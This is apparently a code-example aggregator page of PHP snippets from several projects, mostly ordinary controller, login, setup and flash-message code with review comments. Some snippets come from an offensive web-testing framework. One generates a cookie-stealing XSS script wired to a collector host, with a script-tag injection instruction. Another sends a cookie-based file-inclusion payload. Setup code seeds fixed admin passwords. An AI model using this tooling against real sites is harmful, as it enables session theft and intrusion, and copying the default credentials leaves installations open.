コード例 #1
ファイル: validation.php プロジェクト: xfra35/fabulog
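 /**
  * Validate an e-mail address, optionally checking that its domain has a mail host.
  *
  * On failure the error text is looked up in the hive under
  * "<context>.invalid" / "<context>.host" (falling back to a built-in
  * message), an HTTP 400 error is raised on the framework and the flash
  * key for the context is marked "has-error". An empty value is accepted as
  * valid here; presence has to be enforced by a separate check.
  *
  * @param string      $val     value to validate
  * @param string|null $context hive/flash key prefix; defaults to 'error.validation.email'
  * @param bool        $mx      also require the domain to resolve to a mail host
  * @return bool true when the address passed every enabled check
  */
 function email($val, $context = null, $mx = true)
 {
     if (!$context) {
         $context = 'error.validation.email';
     }
     $valid = true;
     // empty() also treats "0" as absent; presence is not this validator's job
     if (!empty($val)) {
         $audit = \Audit::instance();
         $errKey = null;
         $fallback = null;
         if (!$audit->email($val, false)) {
             $errKey = $context . '.invalid';
             $fallback = 'e-mail is not valid';
         } elseif ($mx && !$audit->email($val, true)) {
             // the second pass (mx=true) is expected to look up the domain's
             // mail hosts, i.e. a network lookup driven by user input
             $errKey = $context . '.host';
             $fallback = 'unknown mail mx.host';
         }
         if ($errKey !== null) {
             // exists() with a second argument copies the hive value into $errText
             if (!$this->f3->exists($errKey, $errText)) {
                 $errText = $fallback;
             }
             $this->f3->error(400, $errText);
             $valid = false;
         }
     }
     if (!$valid) {
         \Flash::instance()->setKey($context, 'has-error');
     }
     return $valid;
 }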
コード例 #2
 /**
  * Render the framework error page (or a JSON body for AJAX requests).
  *
  * Clears every open output buffer first so the error page is the only
  * output. HTTP 400 is treated as a validation failure and only produces a
  * flash message; 404/405/500 get a dedicated headline, and 500 additionally
  * mails the text and trace to 'error_mail'.
  */
 function render()
 {
     // Discard anything already buffered
     while (ob_get_level()) {
         ob_end_clean();
     }
     $f3 = \Base::instance();
     $code = $f3->get('ERROR.code');
     $text = $f3->get('ERROR.text');
     $f3->set('headline', 'Error ' . $code);
     $f3->set('text', $text);
     // ESCAPE=false: the template prints 'text' and 'trace' without HTML
     // escaping, so ERROR.text has to be trusted content. F3 may build it
     // from request data for some codes — confirm before exposing it.
     $f3->set('ESCAPE', false);
     if ($f3->get('AJAX')) {
         // no Content-Type header is sent for this JSON body
         die(json_encode(array('error' => $text)));
     }
     // switch() compares loosely, matching the original `==` checks
     switch ($code) {
         case 400:
             // validation errors stay on the current page as a flash message
             \Flash::instance()->addMessage($text, 'warning');
             $f3->set('HALT', false);
             return;
         case 404:
             $f3->set('headline', 'Page not found');
             break;
         case 405:
             $f3->set('headline', 'This action is not allowed');
             break;
         case 500:
             $f3->set('headline', 'Internal Server Error');
             if ($f3->get('DEV')) {
                 // the stack trace is only put on the page in DEV mode
                 $f3->set('trace', $f3->highlight($f3->get('ERROR.trace')));
             }
             // The trace is always mailed; '@' hides mail() failures, so an
             // unset or wrong 'error_mail' goes unnoticed.
             @mail($f3->get('error_mail'), 'Mth3l3m3nt Framework Error', $text . "\n\n" . $f3->get('ERROR.trace'));
             break;
     }
     $f3->set('LAYOUT', 'error.html');
     $f3->set('HALT', true);
     echo \Template::instance()->render('themes/default/layout.html');
 }
コード例 #3
ファイル: setup.php プロジェクト: xfra35/fabulog
 /**
  * Create the schema for every model on the selected database and seed an
  * admin account when none exists.
  *
  * The seeded username/password are fixed values that are also shown in the
  * flash message, so an installation that keeps them is open to anyone who
  * has read the project's source.
  *
  * @param string $db_type storage key; compared case-insensitively
  */
 public function install($db_type)
 {
     $f3 = \Base::instance();
     $db = storage::instance()->get(strtoupper($db_type));
     if ($db) {
         $f3->set('DB', $db);
     } else {
         // whether error() halts depends on the framework's HALT setting;
         // if it returns, the setup below runs without a DB
         $f3->error(256, 'no valid DB specified');
     }
     // setup the models
     foreach (array('\Model\Post', '\Model\Tag', '\Model\Comment', '\Model\User') as $model) {
         $model::setup();
     }
     // create demo admin user (only when none exists yet)
     $user = new \Model\User();
     $user->load(array('username = ?', 'admin'));
     if ($user->dry()) {
         $user->username = '******';
         $user->name = 'Administrator';
         $user->password = '******';
         $user->save();
         \Flash::instance()->addMessage('Admin User created,' . ' username: admin, password: fabulog', 'success');
     }
     \Flash::instance()->addMessage('Setup complete', 'success');
 }
コード例 #4
 /**
  * Build a per-target copy of the hook script template from a POSTed URL.
  *
  * The target host (from parse_url) becomes part of the output filename and
  * the template placeholders are rewritten to this installation's address.
  * Return values of copy()/file_get_contents()/file_put_contents() are not
  * checked, and a URL without a parsable host produces a file named ".js".
  *
  * @param \Base $f3
  */
 function create_campaign(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'xssrc_campaign.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.targetUrl')) {
         \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
         return;
     }
     $target_url = $f3->get('POST.targetUrl');
     // user-controlled host name ends up in the filesystem path below
     $c_host = parse_url($target_url, PHP_URL_HOST);
     $scriptsDir = $f3->ROOT . $f3->BASE . '/scripts/';
     $publicBase = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE;
     $template_src = $scriptsDir . 'attack_temp.mth3l3m3nt';
     $campaign_file = $scriptsDir . $c_host . '.js';
     $campaign_address = $publicBase . '/scripts/' . $c_host . '.js';
     $postHome = $publicBase . '/xssr';
     copy($template_src, $campaign_file);
     // sequential replacement, same result as the two separate calls
     $contents = str_replace(
         array("http://attacker.mth3l3m3nt.com/xssr", "http://victim.mth3l3m3nt.com/admin/"),
         array($postHome, $target_url),
         file_get_contents($campaign_file)
     );
     file_put_contents($campaign_file, $contents);
     $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
     $this->response->data['content'] = $instructions;
 }
コード例 #5
 /**
  * Return the shared Flash instance, creating it on first use.
  *
  * @return Flash
  */
 public static function getInstance()
 {
     // `?:` keeps the original truthiness check: anything falsy triggers creation
     self::$instance = self::$instance ?: new Flash();
     return self::$instance;
 }
コード例 #6
 /**
  * Lazily create and return the Flash singleton.
  *
  * @return Flash
  */
 public static function instance()
 {
     // isset() on the static property is the `=== NULL` test of the original
     if (!isset(Flash::$instance)) {
         Flash::$instance = new Flash();
     }
     return Flash::$instance;
 }
コード例 #7
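 /**
  * Login Procedure: verify the POSTed credentials and start a user session.
  *
  * Every attempt that supplies both fields is delayed by a fixed 3 seconds
  * to slow down online brute forcing. The verification scheme is chosen by
  * the 'password_hash_engine' setting: 'bcrypt' delegates to \Bcrypt,
  * 'md5' compares against a salted MD5 digest (legacy). On success the
  * session is cleared, 'SESSION.user_id' is set and the user is rerouted;
  * otherwise one generic failure message is flashed and the login template
  * is rendered.
  *
  * @param \Base $f3
  * @param array $params route parameters (unused)
  */
 public function login($f3, $params)
 {
     if ($f3->exists('POST.username') && $f3->exists('POST.password')) {
         // login should take a while to slow down brute-force attempts
         sleep(3);
         $password = $f3->get('POST.password');
         $user = new \Model\User();
         $user->load(array('username = ?', $f3->get('POST.username')));
         if (!$user->dry()) {
             $valid = false;
             $hash_engine = $f3->get('password_hash_engine');
             if ($hash_engine === 'bcrypt') {
                 $valid = \Bcrypt::instance()->verify($password, $user->password);
             } elseif ($hash_engine === 'md5') {
                 // Legacy scheme. hash_equals() replaces `==`, which treats two
                 // different "0e..." digests as equal (numeric-string juggling)
                 // and leaks timing; known value first, user-derived value second.
                 $valid = hash_equals((string) $user->password, md5($password . $f3->get('password_md5_salt')));
             }
             if ($valid) {
                 // '@' hides any notice from clearing a not-yet-started session.
                 // No session id regeneration is visible here; confirm whether
                 // clear('SESSION') rotates the id, otherwise the pre-login id
                 // survives authentication.
                 @$f3->clear('SESSION');
                 $f3->set('SESSION.user_id', $user->_id);
                 if ($f3->get('CONFIG.ssl_backend')) {
                     $f3->reroute('https://' . $f3->get('HOST') . $f3->get('BASE') . '/');
                 } else {
                     $f3->reroute('/cnc');
                 }
             }
         }
         // same message for an unknown user and a wrong password
         \Flash::instance()->addMessage('Wrong Username/Password', 'danger');
     }
     $this->response->setTemplate('templates/login.html');
 }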
コード例 #8
 /**
  * Init Flash service
  *
  * Usable both as an instance method and as a static/procedural call: with
  * a Flash $this the stored flash data is read, otherwise the call is
  * forwarded to the singleton's init().
  *
  * @param void
  * @return null
  */
 function init()
 {
     $isFlashInstance = isset($this) && instance_of($this, 'Flash');
     if (!$isFlashInstance) {
         $instance =& Flash::instance();
         $instance->init();
         return;
     }
     $this->readFlash();
 }
コード例 #9
ファイル: comment.php プロジェクト: xfra35/fabulog
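 /**
  * Load a single comment for editing.
  *
  * @param \Base $f3
  * @param array $params route parameters; 'id' selects the comment
  * @return bool true when the record was found; false after rerouting to
  *              the previous page (only observable if reroute() returns)
  */
 public function getSingle(\Base $f3, $params)
 {
     $this->response->data['SUBPART'] = 'comment_edit.html';
     if (isset($params['id'])) {
         // bound query parameter; the id is not interpolated into the filter
         $this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id']));
         if (!$this->resource->dry()) {
             return true;
         }
     }
     \Flash::instance()->addMessage('Unknown Comment ID', 'danger');
     // redirect target comes from the session; where it is populated is not visible here
     $f3->reroute($f3->get('SESSION.LastPageURL'));
     // honours the documented bool contract when reroute() does not exit
     return false;
 }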
コード例 #10
 /**
  * Delete the calendar event named by $this->_data['id'].
  *
  * Success redirects to the module index; failure flashes an error and sends
  * the user back. No access-permission check precedes the delete here; if
  * one is required it has to be enforced by the caller or framework — confirm.
  */
 public function delete()
 {
     $flash = Flash::instance();
     $event = $this->_templateobject;
     $event->load($this->_data['id']);
     if (!$event->delete()) {
         $flash->addError('Failed to delete event');
         sendBack();
         return;
     }
     $flash->addMessage('Event deleted successfully');
     sendTo('crmcalendars', 'index', $this->_modules);
 }
コード例 #11
ファイル: user.php プロジェクト: xfra35/fabulog
 /**
  * Delete a user record, except for the protected demo admin.
  *
  * The guard keys on HOST being 'ikkez.de' and the loaded record's username
  * being 'admin'; everywhere else deletion is delegated to the parent
  * implementation. HOST reflects what the web server reports for the
  * request, which in some configurations follows the client's Host header —
  * confirm that it cannot be influenced by the client before relying on it.
  *
  * @param \Base $f3
  * @param array $params route parameters ('id', 'module')
  */
 public function delete(\Base $f3, $params)
 {
     $this->resource->reset();
     $msg = \Flash::instance();
     if (!isset($params['id'])) {
         $f3->reroute($f3->get('SESSION.LastPageURL'));
         return;
     }
     $this->resource->load(array('_id = ?', $params['id']));
     $isDemoHost = $f3->get('HOST') == 'ikkez.de';
     $isAdminRecord = !$this->resource->dry() && $this->resource->username == 'admin';
     if ($isDemoHost && $isAdminRecord) {
         $msg->addMessage("You are not allowed to delete the demo-admin", 'danger');
         $f3->reroute('/admin/' . $params['module']);
         return;
     }
     parent::delete($f3, $params);
     $f3->reroute($f3->get('SESSION.LastPageURL'));
 }
コード例 #12
ファイル: resource.php プロジェクト: xfra35/fabulog
 /**
  * delete a record
  *
  * Loads the record named by $params['id'] (as a bound query parameter),
  * erases it when found, flashes the outcome and returns to the previous page.
  *
  * @param \Base $f3
  * @param array $params
  */
 public function delete(\Base $f3, $params)
 {
     $this->resource->reset();
     $flash = \Flash::instance();
     if (isset($params['id'])) {
         $this->resource->load(array('_id = ?', $params['id']));
         $found = !$this->resource->dry();
         if ($found) {
             $this->resource->erase();
         }
         $flash->addMessage(
             $found ? "Record deleted." : 'No record found with this ID.',
             $found ? 'success' : 'danger'
         );
     }
     $f3->reroute($f3->get('SESSION.LastPageURL'));
 }
コード例 #13
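 /**
  * Issue an HTTP request to a user-supplied URL and show the raw response.
  *
  * The URL is validated with \Audit::url() before being fetched, but nothing
  * restricts where the request goes, so access to this form equals the
  * ability to make the server issue HTTP requests. For method POST the
  * 'POST.postReceive' field is parsed as a query string and re-encoded as
  * the request body.
  *
  * @param \Base $f3
  */
 public function generic_request(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.url')) {
         \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         return;
     }
     $address = $f3->get('POST.url');
     if (!\Audit::instance()->url($address)) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
         return;
     }
     $method = $f3->get('POST.means');
     $options = array('method' => $method);
     if ($method == "POST") {
         // Hive keys are case-sensitive: the field is 'POST.postReceive'
         // (it was read as 'Post.postReceive', which is always empty).
         // parse_str() decodes "a=b&c=d" into a map so http_build_query()
         // re-encodes it as form data instead of "0=a%3Db&1=c%3Dd".
         parse_str((string) $f3->get('POST.postReceive'), $postData);
         $options['content'] = http_build_query($postData);
     }
     $response = $web->request($address, $options);
     if (!$response) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
         return;
     }
     $headers_max = implode("\n", $response['headers']);
     $this->response->data['content'] = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $response['body'] . "\n\n Engine Used: " . $response['engine'];
 }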
コード例 #14
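 /**
  * Handles Your little Hurl.it like service to make requests to remote servers using various methods
  *
  * Only GET, POST, TRACE, OPTIONS and HEAD are forwarded; any other method
  * is rejected with a flash message. For POST, 'POST.postReceive' is parsed
  * as a query string and re-encoded as the request body. Redirects are not
  * followed when the (long removed) safe_mode ini flag reads as set. The URL
  * passes \Audit::url() but its destination is otherwise unrestricted, so
  * access to this form equals the ability to make the server issue requests.
  *
  * @package Controller
  * @param \Base $f3
  */
 public function generic_request(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.url')) {
         \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         return;
     }
     $address = $f3->get('POST.url');
     if (!\Audit::instance()->url($address)) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
         return;
     }
     $method = $f3->get('POST.means');
     if (!in_array($method, array("GET", "POST", "TRACE", "OPTIONS", "HEAD"), true)) {
         // Previously this fell through to the failure check below with
         // $request_successful undefined (notice plus a second flash message).
         \Flash::instance()->addMessage('Unsupported Header Method', 'danger');
         return;
     }
     // safe_mode was removed in PHP 5.4; ini_get() returns false there
     $options = array('method' => $method, 'follow_location' => !ini_get('safe_mode'));
     if ($method == "POST") {
         // parse_str() returns nothing useful; the decoded pairs land in $postData
         parse_str((string) $f3->get('POST.postReceive'), $postData);
         $options['content'] = http_build_query($postData);
     }
     $response = $web->request($address, $options);
     if (!$response) {
         \Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning');
         return;
     }
     $headers_max = implode("\n", $response['headers']);
     $this->response->data['content'] = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $response['body'] . "\n\n Engine Used: " . $response['engine'];
 }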
コード例 #15
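 /**
  * Installs tables with default user
  *
  * Selects the database by type, creates the model tables and — only when
  * no 'mth3l3m3nt' user exists yet — seeds an administrator account and
  * imports the optional payload starter pack from
  * ROOT.BASE.'/db_dump_optional/mth3l3m3nt_payload' (a JSON list of rows).
  *
  * The seeded credentials are fixed values that are also announced in a
  * flash message, so a fresh install is accessible to anyone who knows them
  * until they are changed.
  *
  * @param string $db_type database type key, compared case-insensitively
  */
 public function install($db_type)
 {
     $f3 = \Base::instance();
     $db = DBHandler::instance()->get(strtoupper($db_type));
     if ($db) {
         $f3->set('DB', $db);
     } else {
         // whether error() halts depends on the framework's HALT setting;
         // if it returns, the setup below runs without a DB
         $f3->error(256, 'no valid Database Type specified');
     }
     // setup the models
     \Model\User::setup();
     \Model\Payload::setup();
     \Model\Webot::setup();
     // create demo admin user
     $user = new \Model\User();
     $user->load(array('username = ?', 'mth3l3m3nt'));
     if ($user->dry()) {
         $user->username = '******';
         $user->name = 'Framework Administrator';
         $user->password = '******';
         $user->email = '*****@*****.**';
         $user->save();
         // migrate the optional payload starter pack
         $payload_file = $f3->ROOT . $f3->BASE . '/db_dump_optional/mth3l3m3nt_payload';
         $payloadarray = file_exists($payload_file) ? json_decode($f3->read($payload_file), true) : null;
         // json_decode() yields null for malformed input; the foreach used to
         // warn on it and the success message was still shown
         if (is_array($payloadarray)) {
             $payload = new \Model\Payload();
             foreach ($payloadarray as $payloaddata) {
                 $payload->pName = $payloaddata['pName'];
                 $payload->pType = $payloaddata['pType'];
                 $payload->pCategory = $payloaddata['pCategory'];
                 $payload->pDescription = $payloaddata['pDescription'];
                 $payload->payload = $payloaddata['payload'];
                 $payload->save();
                 // ensures values are cleared before the next row is written
                 $payload->reset();
             }
             \Flash::instance()->addMessage('Payload StarterPack: ,' . 'All Starter Pack Payloads added New database', 'success');
         } else {
             // file missing, or not a decodable JSON list
             \Flash::instance()->addMessage('Payload StarterPack: ,' . 'StarterPack Database not Found no payloads installed ', 'danger');
         }
         \Flash::instance()->addMessage('Admin User created,' . ' username: mth3l3m3nt, password: mth3l3m3nt', 'success');
     }
     \Flash::instance()->addMessage('New Database Setup Completed', 'success');
 }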
コード例 #16
 /**
  * Save the selected database connection settings and (re)install on it.
  *
  * The POSTed 'active_db' value selects which 'DB_<type>' config entry is
  * overwritten from 'POST.DB_<type>', so the property name written to the
  * config object is derived from request input. After saving, the schema
  * is installed on the new database and the current login is dropped.
  *
  * @param \Base $f3
  */
 public function database(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'settings_database.html';
     $cfg = \Config::instance();
     $submitted = $f3->get('VERB') == 'POST' && $f3->exists('POST.active_db');
     if ($submitted) {
         $type = $f3->get('POST.active_db');
         // property name 'DB_<type>' is built from the submitted value
         $cfg->{'DB_' . $type} = $f3->get('POST.DB_' . $type);
         $cfg->ACTIVE_DB = $type;
         $cfg->save();
         \Flash::instance()->addMessage('Config saved', 'success');
         $setup = new \Setup();
         $setup->install($type);
         // logout: drop the session user so the next request re-authenticates
         $f3->clear('SESSION.user_id');
     }
     $cfg->copyto('POST');
     $f3->set('JIG_format', array('JSON', 'Serialized'));
 }
コード例 #17
ファイル: Auth.php プロジェクト: Kekesed/Kambeng-Blog
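 /**
  * Handle the login form: verify credentials and establish the session.
  *
  * On success the session gets user_type 'admin'; without the 'remember'
  * flag the user id and object are stored in the session, with it only a
  * 'user' cookie holding the plain user id is set (what later trusts that
  * cookie is outside this block — confirm it is not accepted as-is). On
  * failure a message is flashed and the login page is rendered again.
  *
  * @param \Base $f3
  */
 function post_index($f3)
 {
     $user = \User::createUser(\kksd\Sesi::$DB);
     $email = $f3->POST['email'];
     $user->load(array("email=?", $email));
     if (!$user->checkLogin($f3->get('POST.email'), $f3->get('POST.password'))) {
         \Flash::instance()->addMessage('Wrong password, you morron!', 'danger');
         $this->index($f3);
         return;
     }
     // reloaded after the check, as in the original flow
     $user->load(array("email=?", $email));
     $f3->SESSION['user_type'] = 'admin';
     // get() returns null for an absent field; indexing $f3->POST['remember']
     // directly raised an undefined-index notice when the box was unchecked
     if (!$f3->get('POST.remember')) {
         $f3->SESSION['user'] = $user->id;
         $f3->SESSION['user_obj'] = $user;
     } else {
         // NOTE(review): F3's set() takes a cookie TTL in seconds; passing an
         // absolute timestamp likely yields a far-future expiry rather than
         // 7 days — confirm against the framework version in use.
         $f3->set('COOKIE.user', $user->id, time() + 24 * 3600 * 7);
     }
     $f3->reroute('@admin_home');
     return;
 }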
コード例 #18
 /**
  * Run a WHOIS lookup for a POSTed hostname and show the raw result.
  *
  * The hostname is forwarded to Web::whois() unchanged; whether that helper
  * validates it before writing it to the WHOIS socket is not visible here —
  * confirm.
  *
  * @param \Base $f3
  */
 public function getwhois(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_whois.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.hostname')) {
         \Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
         return;
     }
     $mywhois = $web->whois($f3->get('POST.hostname'));
     if (!$mywhois) {
         \Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
         return;
     }
     $this->response->data['content'] = $mywhois;
 }
コード例 #19
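 /**
  * Mark a despatch event as deleted (status 'X') after a permission check.
  *
  * Requires 'edit' permission on despatch/sodespatchevents. The record is
  * not erased; its status is set to 'X' and saved through parent::save().
  * Success redirects to the index, failure sends the user back.
  */
 public function delete()
 {
     // obtained up front: the original only assigned $flash inside the
     // permitted branch and dereferenced null on the denied path
     $flash = Flash::instance();
     $accessobject = AccessObject::Instance();
     if (!$accessobject->hasPermission('despatch', 'sodespatchevents', 'edit')) {
         $flash->addError("You don't have permission to delete an event");
         sendBack();
         return;
     }
     $event = $this->_uses['SODespatchEvent'];
     $event->load($this->_data['id']);
     // soft delete: the saved model only changes its status
     $this->_data['SODespatchEvent']['id'] = $this->_data['id'];
     $this->_data['SODespatchEvent']['status'] = 'X';
     if (!parent::save('SODespatchEvent')) {
         $flash->addError("Failed to delete event");
         sendBack();
         return;
     }
     $flash->clearMessages();
     $flash->addMessage("Event successfully deleted");
     sendTo('sodespatchevents', 'index', array('despatch'));
 }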
コード例 #20
 /**
  * Send one request with $payload as the Cookie header and report the reply.
  *
  * Only runs for POST submissions. The URL is checked with \Audit::url() but
  * not otherwise restricted. A status line containing '200 OK' puts the full
  * headers and body into the response content; any other status reports the
  * headers only. Failures from Web::request() surface as flash messages.
  *
  * @param string $method   HTTP method passed to Web::request()
  * @param bool   $blankurl flag set by the caller when the form had no URL
  * @param string $url      target URL
  * @param string $payload  raw value for the Cookie header
  */
 public function cookie_based_lfi($method, $blankurl, $url, $payload)
 {
     $web = \Web::instance();
     $f3 = \Base::instance();
     $options = array('method' => $method, 'header' => array('Accept: */*', 'User-Agent: Mth3l3m3ntFramework/4.0 (compatible; MSIE 6.0; HackingtoshTuxu 4.0; .NET CLR 1.1.4322)', 'Cookie: ' . $payload, 'Connection: Close', 'Pragma: no-cache', 'Cache-Control: no-cache'));
     $audit_instance = \Audit::instance();
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($blankurl) {
         \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         return;
     }
     if (!$audit_instance->url($url)) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
         return;
     }
     $response = $web->request($url, $options);
     if (!$response) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
         return;
     }
     // headers are joined for display; entry "0" is the status line
     $headers_max = implode("\n", $response['headers']);
     $status_line = $response['headers']["0"];
     if (strpos($status_line, '200 OK') !== false) {
         $this->response->data['content'] = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $response['body'] . "\n\n Engine Used: " . $response['engine'];
     } else {
         $this->response->data['content'] = "Not Exploitable Application Returned the response below: \n\n " . $headers_max;
     }
 }
コード例 #21
ファイル: PersonsController.php プロジェクト: uzerpllp/uzerp
 /**
  * Save a Person together with its address, contact methods and category
  * links inside one DB transaction.
  *
  * Flow: validate params, (re)load an existing person when an id is posted,
  * start a transaction, normalise the posted Address / PartyContactMethod
  * data, save the person via parent::save(), then reconcile the person's
  * ContactCategory associations (deleting those no longer posted, inserting
  * new ones) unless a ledger entry depends on a category being removed.
  * Only the all-OK path commits and redirects; every other path reaches the
  * failure block at the bottom, which rolls back, reports $errors and
  * refreshes the form.
  *
  * Relies on sendBack()/sendTo() ending the request; where they return,
  * execution continues into the following code.
  */
 public function save()
 {
     $errors = array();
     $person = $this->_templateobject;
     $personmodel = get_class($person);
     if (!$this->checkParams($personmodel)) {
         // no return here: depends on sendBack() not returning
         sendBack();
     }
     $persondata = $this->_data[$personmodel];
     $personidfield = $person->idField;
     if (isset($persondata[$person->idField])) {
         $personid = $persondata[$personidfield];
     } else {
         $personid = '';
     }
     if (!empty($personid)) {
         $person->load($personid);
         if (!$person->isLoaded()) {
             // a failed load is reported as a permission problem; an id that
             // simply does not exist is not distinguished from a denied one
             $flash = Flash::instance();
             $flash->addError('You do not have permission to edit this person.');
             sendTo($this->name, 'index', $this->_modules);
             return;
         }
     }
     $flash = Flash::Instance();
     $db =& DB::Instance();
     $db->StartTrans();
     if (isset($this->_data['Address']) && !empty($this->_data['Address']['id'])) {
         // Selected pre-existing address: drop the posted Address data so no new one is created
         unset($this->_data['Address']);
     }
     if (isset($this->_data['PartyAddress']) && isset($this->_data['Address'])) {
         $partyaddress = DataObjectFactory::Factory('PartyAddress');
         $partyaddress->checkAddress($this->_data);
     }
     // For each contact-method type: an empty contact value means the posted
     // method is dropped (and a stored one deleted when an id is present),
     // otherwise it is validated.
     $partycontactmethod = DataObjectFactory::Factory('PartyContactMethod');
     foreach ($partycontactmethod->getEnumOptions('type') as $key => $type) {
         if (isset($this->_data[$type]['PartyContactMethod']) && isset($this->_data[$type]['Contactmethod'])) {
             if (empty($this->_data[$type]['Contactmethod']['contact'])) {
                 if (!empty($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField])) {
                     $partycontactmethod->delete($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField], $errors);
                 }
                 unset($this->_data[$type]);
             } else {
                 $partycontactmethod->check($this->_data[$type]);
             }
         }
     }
     if (count($errors) == 0 && parent::save($personmodel, $this->_data, $errors)) {
         // pick the saved person out of the models parent::save() recorded
         foreach ($this->saved_models as $model) {
             if (isset($model[$personmodel])) {
                 $person = $model[$personmodel];
                 break;
             }
         }
         // Now get the saved Person details
         $person_id = $person->{$personidfield};
         $people_category = DataObjectFactory::Factory('PeopleInCategories');
         $current_categories = $people_category->getCategoryID($person_id);
         $check_categories = array();
         $delete_categories = array();
         $insert_categories = array();
         $new_categories = array();
         if (isset($this->_data['ContactCategories'])) {
             // diff current vs posted: removed, added, and the resulting set
             $delete_categories = array_diff($current_categories, $this->_data['ContactCategories']['category_id']);
             $insert_categories = array_diff($this->_data['ContactCategories']['category_id'], $current_categories);
             $new_categories = array_diff($current_categories, $delete_categories);
             // `+` unions by key: an inserted entry sharing a key with a kept
             // one is dropped here — key semantics not visible, confirm
             $new_categories += $insert_categories;
         } else {
             // nothing posted at all: every current association is removed
             $delete_categories = $current_categories;
         }
         // Refuse to remove a category a ledger still needs, unless another
         // remaining category covers that ledger type.
         $ledger_category = DataObjectFactory::Factory('LedgerCategory');
         $ledger_types = $ledger_category->checkPersonUsage($person_id);
         foreach ($ledger_types as $ledger_type => $categories) {
             if ($categories['exists'] && !array_intersect($categories['categories'], $new_categories)) {
                 foreach (array_intersect($categories['categories'], $delete_categories) as $category_id) {
                     $category = DataObjectFactory::Factory('ContactCategory');
                     $category->load($category_id);
                     $errors[$category->name] = 'Cannot remove category ' . $category->name . ' - ' . $ledger_type . ' entry exists';
                 }
             }
         }
         $result = count($errors) == 0;
         if (!empty($delete_categories) && $result) {
             // All OK, so delete the associations
             // deletes by key, so $current_categories is presumably keyed by
             // association id — confirm against getCategoryID()
             $result = $people_category->delete(array_keys($delete_categories), $errors);
         }
         if (!empty($insert_categories) && $result) {
             // No errors and some new categories to assign to the person
             $result = $people_category->insert($insert_categories, $person_id);
         }
         if ($result) {
             // All OK
             $db->CompleteTrans();
             sendTo($this->name, 'view', $this->_modules, array($personidfield => $person_id));
         }
     }
     // Failure block: reached on any error, and also after the success
     // redirect above if sendTo() returns.
     $flash = Flash::Instance();
     $flash->addErrors($errors);
     $db->FailTrans();
     $db->CompleteTrans();
     $this->refresh();
 }
コード例 #22
 /**
  * Delete a record by id, then return to the previous page.
  *
  * Loads the record first (bound query parameter) and defers the actual
  * erase — and presumably the outcome messages — to the parent
  * implementation; without an 'id' it only reroutes.
  *
  * @param \Base $f3
  * @param array $params route parameters ('id')
  */
 public function delete(\Base $f3, $params)
 {
     $this->resource->reset();
     $msg = \Flash::instance(); // obtained but not used in this override
     if (!isset($params['id'])) {
         $f3->reroute($f3->get('SESSION.LastPageURL'));
         return;
     }
     $this->resource->load(array('_id = ?', $params['id']));
     parent::delete($f3, $params);
     $f3->reroute($f3->get('SESSION.LastPageURL'));
 }
コード例 #23
ファイル: application.php プロジェクト: bklein01/Project-Pier
 * resources etc
 *
 * @version 1.0
 * @http://www.projectpier.org/
 */
trace(__FILE__, 'begin');
// file storage backend identifiers (their consumers are not visible here)
define('FILE_STORAGE_FILE_SYSTEM', 'fs');
define('FILE_STORAGE_MYSQL', 'mysql');
// cookie name is namespaced by the table prefix so several installs on one host do not collide
define('TOKEN_COOKIE_NAME', 'pp088' . TABLE_PREFIX);
//$installation_root = config_option('installation_root', dirname($_SERVER['PHP_SELF']) );
// ROOT_URL is PHP_SELF cut off before 'index.php'. PHP_SELF is built from the
// request path and can carry client-supplied text; if ROOT_URL is ever echoed
// into HTML unescaped that is an injection point — confirm where it is
// rendered. When 'index.php' is absent strpos() is false and $path becomes ''.
$path = $_SERVER['PHP_SELF'];
$path = substr($path, 0, strpos($path, 'index.php'));
$installation_root = $path;
define('ROOT_URL', $installation_root);
// Init flash!
Flash::instance();
$language = config_option('installation_base_language', 'en_us');
// A ?language= parameter is stored in the session without validation and
// later passed to loadSettings() together with a directory path; the loader
// must be the one to reject anything that is not a known locale name — confirm.
if (isset($_GET['language'])) {
    $_SESSION['language'] = $_GET['language'];
    $_GET['language'] = '';
}
if (isset($_SESSION['language'])) {
    $language = $_SESSION['language'];
}
// an active i18n plugin is expected to take over localisation itself
if (!plugin_active('i18n')) {
    Localization::instance()->loadSettings($language, ROOT . '/language');
}
try {
    trace(__FILE__, 'CompanyWebsite::init()');
    CompanyWebsite::init();
    if (config_option('upgrade_check_enabled', false)) {
コード例 #24
}
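// $writeableErr may already hold entries from the check that closes just above.
if (!is_writable('framework/data/')) {
    $writeableErr[] = sprintf('please make sure that the \'%s\' directory is writable.', 'framework/data/');
}
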